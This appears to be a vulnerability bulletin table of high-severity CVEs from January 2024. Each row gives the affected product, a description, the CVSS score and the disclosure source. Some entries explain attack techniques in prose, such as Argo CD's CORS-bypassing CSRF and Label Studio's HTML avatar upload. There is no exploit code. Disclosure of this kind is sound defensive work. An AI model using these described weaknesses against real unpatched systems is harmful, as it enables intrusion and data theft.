High Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| 60indexpage — 60indexpage  |
A vulnerability classified as critical has been found in 60IndexPage up to 1.8.5. This affects an unknown part of the file /include/file.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.3 | CVE-2024-0945 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| 60indexpage — 60indexpage  |
A vulnerability classified as critical was found in 60IndexPage up to 1.8.5. This vulnerability affects unknown code of the file /apply/index.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.3 | CVE-2024-0946 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| actidata — actinas_sl_2u-8_rdx_firmware | Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication. | 2024-01-19 | 9.1 | CVE-2023-51947 cve@mitre.org cve@mitre.org cve@mitre.org |
| actidata — actinas_sl_2u-8_rdx_firmware | A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application. | 2024-01-19 | 7.5 | CVE-2023-51948 cve@mitre.org cve@mitre.org |
| anomali — match | Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3. | 2024-01-19 | 7.2 | CVE-2023-49329 cve@mitre.org cve@mitre.org |
| apache_software_foundation — apache_superset  |
A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS. For 2.X versions, users should change their config to include: TALISMAN_CONFIG = {   “content_security_policy”: {     “base-uri”: [“‘self'”],     “default-src”: [“‘self'”],     “img-src”: [“‘self'”, “blob:”, “data:”],     “worker-src”: [“‘self'”, “blob:”],     “connect-src”: [       “‘self'”,       ” https://api.mapbox.com” https://api.mapbox.com” ;,       ” https://events.mapbox.com” https://events.mapbox.com” ;,     ],     “object-src”: “‘none'”,     “style-src”: [       “‘self'”,       “‘unsafe-inline'”,     ],     “script-src”: [“‘self'”, “‘strict-dynamic'”],   },   “content_security_policy_nonce_in”: [“script-src”],   “force_https”: False,   “session_cookie_secure”: False, } | 2024-01-23 | 9.6 | CVE-2023-49657 security@apache.org |
| apple — ipados | The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. | 2024-01-23 | 7.5 | CVE-2024-23203 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ipados | The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. | 2024-01-23 | 7.5 | CVE-2024-23204 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — macos | The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3. Processing web content may lead to arbitrary code execution. | 2024-01-23 | 8.8 | CVE-2024-23209 product-security@apple.com product-security@apple.com |
| apple — macos | The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2. Processing a file may lead to unexpected app termination or arbitrary code execution. | 2024-01-23 | 7.8 | CVE-2023-42881 product-security@apple.com |
| argo– cd_api  |
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-01-19 | 8.3 | CVE-2024-22424 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| arris — surfboard_sbg6950ac2 Â |
An arbitrary code execution vulnerability exists in Arris SURFboard SGB6950AC2 devices. An unauthenticated attacker can exploit this vulnerability to achieve code execution as root. | 2024-01-26 | 9.6 | CVE-2024-23618 disclosures@exodusintel.com |
| asus– armoury_crate  |
ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission. | 2024-01-19 | 9.8 | CVE-2023-5716 twcert@cert.org.tw |
| benbusby — whoogle-search  |
Whoogle Search is a self-hosted metasearch engine. In versions prior to 0.8.4, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a GET request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. | 2024-01-23 | 9.1 | CVE-2024-22203 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| benbusby — whoogle-search  |
Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `window` endpoint does not sanitize user-supplied input from the `location` variable and passes it to the `send` method which sends a `GET` request on lines 339-343 in `request.py,` which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. | 2024-01-23 | 9.1 | CVE-2024-22205 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| biges_safe_life_technologies_electronics_inc. — vguard  |
Path Traversal: ‘/../filedir’ vulnerability in Biges Safe Life Technologies Electronics Inc. VGuard allows Absolute Path Traversal.This issue affects VGuard: before V500.0003.R008.4011.C0012.B351.C. | 2024-01-26 | 7.5 | CVE-2023-6919 iletisim@usom.gov.tr |
| byzoro — smart_s150_firmware | A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 9.8 | CVE-2024-0712 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| cisco — cisco_unified_contact_center_enterprise  |
A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to the improper processing of user-provided data that is being read into memory. An attacker could exploit this vulnerability by sending a crafted message to a listening port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user. With access to the underlying operating system, the attacker could also establish root access on the affected device. | 2024-01-26 | 9.9 | CVE-2024-20253 ykramarz@cisco.com |
| clickhouse — java_libraries | Exposure of sensitive information in exceptions in ClichHouse’s clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when ‘sslkey’ is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message. | 2024-01-19 | 8.8 | CVE-2024-23689 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| crestron — am-300 Â |
There is an OS command injection vulnerability in Crestron AM-300 firmware version 1.4499.00018 which may enable a user of a limited-access SSH session to escalate their privileges to root-level access. | 2024-01-23 | 8.4 | CVE-2023-6926 ics-cert@hq.dhs.gov |
| d-link — dap-1650 Â |
A command injection vulnerability exists in the gena.cgi module of D-Link DAP-1650 devices. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. | 2024-01-26 | 9.6 | CVE-2024-23624 disclosures@exodusintel.com |
| d-link — dap-1650 Â |
A command injection vulnerability exists in D-Link DAP-1650 devices when handling UPnP SUBSCRIBE messages. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. | 2024-01-26 | 9.6 | CVE-2024-23625 disclosures@exodusintel.com |
| dedecms — dedecms | DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php. | 2024-01-22 | 8.8 | CVE-2024-22895 cve@mitre.org |
| delhivery — delhivery_logistics_courier  |
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Delhivery Delhivery Logistics Courier. This issue affects Delhivery Logistics Courier: from n/a through 1.0.107. | 2024-01-27 | 8.5 | CVE-2024-22283 audit@patchstack.com |
| dell — networker_module_for_databases_and_applications_oracle  |
Networker 19.9 and all prior versions contains a Plain-text Password stored in temporary config file during backup duration in NMDA MySQL Database backups. User has low privilege access to Networker Client system could potentially exploit this vulnerability, leading to the disclosure of configured MySQL Database user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application Database with privileges of the compromised account. | 2024-01-25 | 7.8 | CVE-2024-22432 security_alert@emc.com |
| dexidp — dex  |
Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex 2.37.0 serves HTTPS with insecure TLS 1.0 and TLS 1.1. `cmd/dex/serve.go` line 425 seemingly sets TLS 1.2 as minimum version, but the whole `tlsConfig` is ignored after `TLS cert reloader` was introduced in v2.37.0. Configured cipher suites are not respected either. This issue is fixed in Dex 2.38.0. | 2024-01-25 | 7.5 | CVE-2024-23656 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| dolibarr — dolibarr  |
Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Version 18.0.4 has a HTML Injection vulnerability in the Home page of the Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application’s response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS). To remediate the issue, validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks; and implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML. | 2024-01-25 | 7.1 | CVE-2024-23817 security-advisories@github.com |
| dom96 — httpbeast | An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component. | 2024-01-19 | 9.8 | CVE-2023-50694 cve@mitre.org cve@mitre.org cve@mitre.org |
| dremio — dremio | Dremio before 24.3.1 allows path traversal. An authenticated user who has no privileges on certain folders (and the files and datasets in these folders) can access these folders, files, and datasets. To be successful, the user must have access to the source and at least one folder in the source. Affected versions are: 24.0.0 through 24.3.0, 23.0.0 through 23.2.3, and 22.0.0 through 22.2.2. Fixed versions are: 24.3.1 and later, 23.2.4 and later, and 22.2.3 and later. | 2024-01-22 | 8.8 | CVE-2024-23768 cve@mitre.org |
| ejinshan — terminal_security_system | File upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server. | 2024-01-20 | 9.8 | CVE-2021-31314 cve@mitre.org |
| embedchain — embedchain | The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, related to the openapi.py yaml.load function argument. | 2024-01-21 | 9.8 | CVE-2024-23731 cve@mitre.org cve@mitre.org |
| embedchain — embedchain | The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py. | 2024-01-21 | 7.5 | CVE-2024-23732 cve@mitre.org cve@mitre.org |
| enonic — xp | Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes. | 2024-01-19 | 9.8 | CVE-2024-23679 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| fortra — goanywhere_mft  |
Authentication bypass in Fortra’s GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. | 2024-01-22 | 9.8 | CVE-2024-0204 df4dee71-de3a-4139-9588-11b62fe6c0ff df4dee71-de3a-4139-9588-11b62fe6c0ff df4dee71-de3a-4139-9588-11b62fe6c0ff |
| foru_cms_project — foru_cms | A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551. | 2024-01-19 | 9.8 | CVE-2024-0728 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| foru_cms_project — foru_cms | A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552. | 2024-01-19 | 9.8 | CVE-2024-0729 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| freerdp — freerdp | FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-22211 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| freesshd — freesshd | A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547. | 2024-01-19 | 7.5 | CVE-2024-0723 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| garethhk — mldong | A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0738 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| gitlab — gitlab  |
An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace. | 2024-01-26 | 9.9 | CVE-2024-0402 cve@gitlab.com cve@gitlab.com |
| hewlett_packard_enterprise — hpe_oneview  |
HPE OneView may allow command injection with local privilege escalation. | 2024-01-23 | 7.8 | CVE-2023-50274 security-alert@hpe.com |
| hewlett_packard_enterprise — hpe_oneview  |
HPE OneView may allow clusterService Authentication Bypass resulting in denial of service. | 2024-01-23 | 7.5 | CVE-2023-50275 security-alert@hpe.com |
| hitron_systems — dvr_hvr-16781 Â |
Improper Input Validation in Hitron Systems DVR HVR-16781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22770 vuln@krcert.or.kr |
| hitron_systems — dvr_hvr-4781 Â |
Improper Input Validation in Hitron Systems DVR HVR-4781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22768 vuln@krcert.or.kr |
| hitron_systems — dvr_hvr-8781 Â |
Improper Input Validation in Hitron Systems DVR HVR-8781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22769 vuln@krcert.or.kr |
| hitron_systems — dvr_lguvr-4h  |
Improper Input Validation in Hitron Systems DVR LGUVR-4H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22771 vuln@krcert.or.kr |
| hitron_systems — dvr_lguvr-8h  |
Improper Input Validation in Hitron Systems DVR LGUVR-8H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-22772 vuln@krcert.or.kr |
| hitron_systems_dvr — dvr_lguvr-16h  |
Improper Input Validation in Hitron Systems DVR LGUVR-16H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. | 2024-01-23 | 7.4 | CVE-2024-23842 vuln@krcert.or.kr |
| humansignal — label-studio  |
Label Studio is an a popular open source data labeling tool. Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. The file `users/functions.py` lines 18-49 show that the only verification check is that the file is an image by extracting the dimensions from the file. Label Studio serves avatar images using Django’s built-in `serve` view, which is not secure for production use according to Django’s documentation. The issue with the Django `serve` view is that it determines the `Content-Type` of the response by the file extension in the URL path. Therefore, an attacker can upload an image that contains malicious HTML code and name the file with a `.html` extension to be rendered as a HTML page. The only file extension validation is performed on the client-side, which can be easily bypassed. Version 1.9.2 fixes this issue. Other remediation strategies include validating the file extension on the server side, not in client-side code; removing the use of Django’s `serve` view and implement a secure controller for viewing uploaded avatar images; saving file content in the database rather than on the filesystem to mitigate against other file related vulnerabilities; and avoiding trusting user controlled inputs. | 2024-01-23 | 7.1 | CVE-2023-47115 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 federated server is vulnerable to a denial of service when a specially crafted cursor is used. IBM X-Force ID: 268759. | 2024-01-22 | 7.5 | CVE-2023-45193 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to an insecure cryptographic algorithm and to information disclosure in stack trace under exceptional conditions. IBM X-Force ID: 270730. | 2024-01-22 | 7.5 | CVE-2023-47152 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — maximo_application_suite | IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843. | 2024-01-19 | 8.8 | CVE-2023-47718 psirt@us.ibm.com psirt@us.ibm.com psirt@us.ibm.com |
| ibm — openpages_with_watson | IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in a OpenPages environment using Native authentication. If OpenPages is using Native authentication an attacker with access to the OpenPages database could through a series of specially crafted steps could exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594. | 2024-01-19 | 8.1 | CVE-2023-38738 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — openpages_with_watson | IBM OpenPages with Watson 8.3 and 9.0 could allow remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005. | 2024-01-19 | 8.8 | CVE-2023-40683 psirt@us.ibm.com psirt@us.ibm.com |
| ibm_merge_healthcare — _efilm_workstation  |
An improper privilege management vulnerability exists in IBM Merge Healthcare eFilm Workstation. A local, authenticated attacker can exploit this vulnerability to escalate privileges to SYSTEM. | 2024-01-26 | 8.8 | CVE-2024-23620 disclosures@exodusintel.com |
| ibm_merge_healthcare — efilm_workstation  |
A buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution. | 2024-01-26 | 10 | CVE-2024-23621 disclosures@exodusintel.com |
| ibm_merge_healthcare — efilm_workstation  |
A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges. | 2024-01-26 | 10 | CVE-2024-23622 disclosures@exodusintel.com |
| ibm_merge_healthcare — efilm_workstation  |
A hardcoded credential vulnerability exists in IBM Merge Healthcare eFilm Workstation. A remote, unauthenticated attacker can exploit this vulnerability to achieve information disclosure or remote code execution. | 2024-01-26 | 9.8 | CVE-2024-23619 disclosures@exodusintel.com |
| instawp_team — instawp_connec-1_click_wp_staging_&_migration  |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration. This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9. | 2024-01-27 | 7.7 | CVE-2024-23506 audit@patchstack.com |
| intel — nuc_bios  |
Improper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-28738 secure@intel.com |
| intel — nuc_bios  |
Improper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-28743 secure@intel.com |
| intel — nuc_bios  |
Improper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-29495 secure@intel.com |
| intel — nuc_pro  |
Uncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access. | 2024-01-19 | 7.9 | CVE-2023-32272 secure@intel.com |
| intel– hotkey  |
Improper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access. | 2024-01-19 | 7.3 | CVE-2023-32544 secure@intel.com |
| intel– nuc_8_compute_element_bios  |
Improper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-42766 secure@intel.com |
| intel– nuc_bios  |
Improper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-38587 secure@intel.com |
| intel– nuc_bios  |
Improper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 7.5 | CVE-2023-42429 secure@intel.com |
| jester_project — jester | An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request. | 2024-01-19 | 9.8 | CVE-2023-50693 cve@mitre.org cve@mitre.org cve@mitre.org |
| joommasters — jmssetting | In the module “Jms Setting” (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection. | 2024-01-19 | 9.8 | CVE-2023-50030 cve@mitre.org cve@mitre.org |
| jsrsasign — jsrsasign  |
Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting this vulnerability. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround This vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library. | 2024-01-22 | 7.5 | CVE-2024-21484 report@snyk.io report@snyk.io report@snyk.io report@snyk.io report@snyk.io report@snyk.io |
| juniper_networks — junos_os  |
An Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an attacker to construct a URL that when visited by another user enables the attacker to execute commands with the target’s permissions, including an administrator. A specific invocation of the emit_debug_note method in webauth_operation.php will echo back the data it receives. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S10; * 21.2 versions earlier than 21.2R3-S8; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3-S1; * 23.2 versions earlier than 23.2R2; * 23.4 versions earlier than 23.4R2. | 2024-01-25 | 8.8 | CVE-2024-21620 sirt@juniper.net |
| keycloak — keycloak  |
A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users. | 2024-01-26 | 7.1 | CVE-2023-6291 secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| leadshop — leadshop | A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0739 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| lemmynet — lemmy  |
Lemmy is a link aggregator and forum for the fediverse. Starting in version 0.17.0 and prior to version 0.19.1, users can report private messages, even when they’re neither sender nor recipient of the message. The API response to creating a private message report contains the private message itself, which means any user can just iterate over message ids to (loudly) obtain all private messages of an instance. A user with instance admin privileges can also abuse this if the private message is removed from the response, as they’re able to see the resulting reports. Creating a private message report by POSTing to `/api/v3/private_message/report` does not validate whether the reporter is the recipient of the message. lemmy-ui does not allow the sender to report the message; the API method should likely be restricted to accessible to recipients only. The API response when creating a report contains the `private_message_report_view` with all the details of the report, including the private message that has been reported: Any authenticated user can obtain arbitrary (untargeted) private message contents. Privileges required depend on the instance configuration; when registrations are enabled without application system, the privileges required are practically none. When registration applications are required, privileges required could be considered low, but this assessment heavily varies by instance. Version 0.19.1 contains a patch for this issue. A workaround is available. If an update to a fixed Lemmy version is not immediately possible, the API route can be blocked in the reverse proxy. This will prevent anyone from reporting private messages, but it will also prevent exploitation before the update has been applied. | 2024-01-24 | 7.5 | CVE-2024-23649 security-advisories@github.com security-advisories@github.com |
| lenovo — tab_m8_hd_tb8505f_firmware | A privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands. | 2024-01-19 | 7.8 | CVE-2023-5080 psirt@lenovo.com |
| lenovo — vantage | A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges. | 2024-01-19 | 7.8 | CVE-2023-6043 psirt@lenovo.com |
| linux — kernel  |
A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector’s deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on. | 2024-01-21 | 7 | CVE-2023-6531 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| ls1intum — artemis_java_test_sandbox | Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. | 2024-01-19 | 8.2 | CVE-2024-23681 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| ls1intum — artemis_java_test_sandbox | Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. | 2024-01-19 | 8.2 | CVE-2024-23682 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
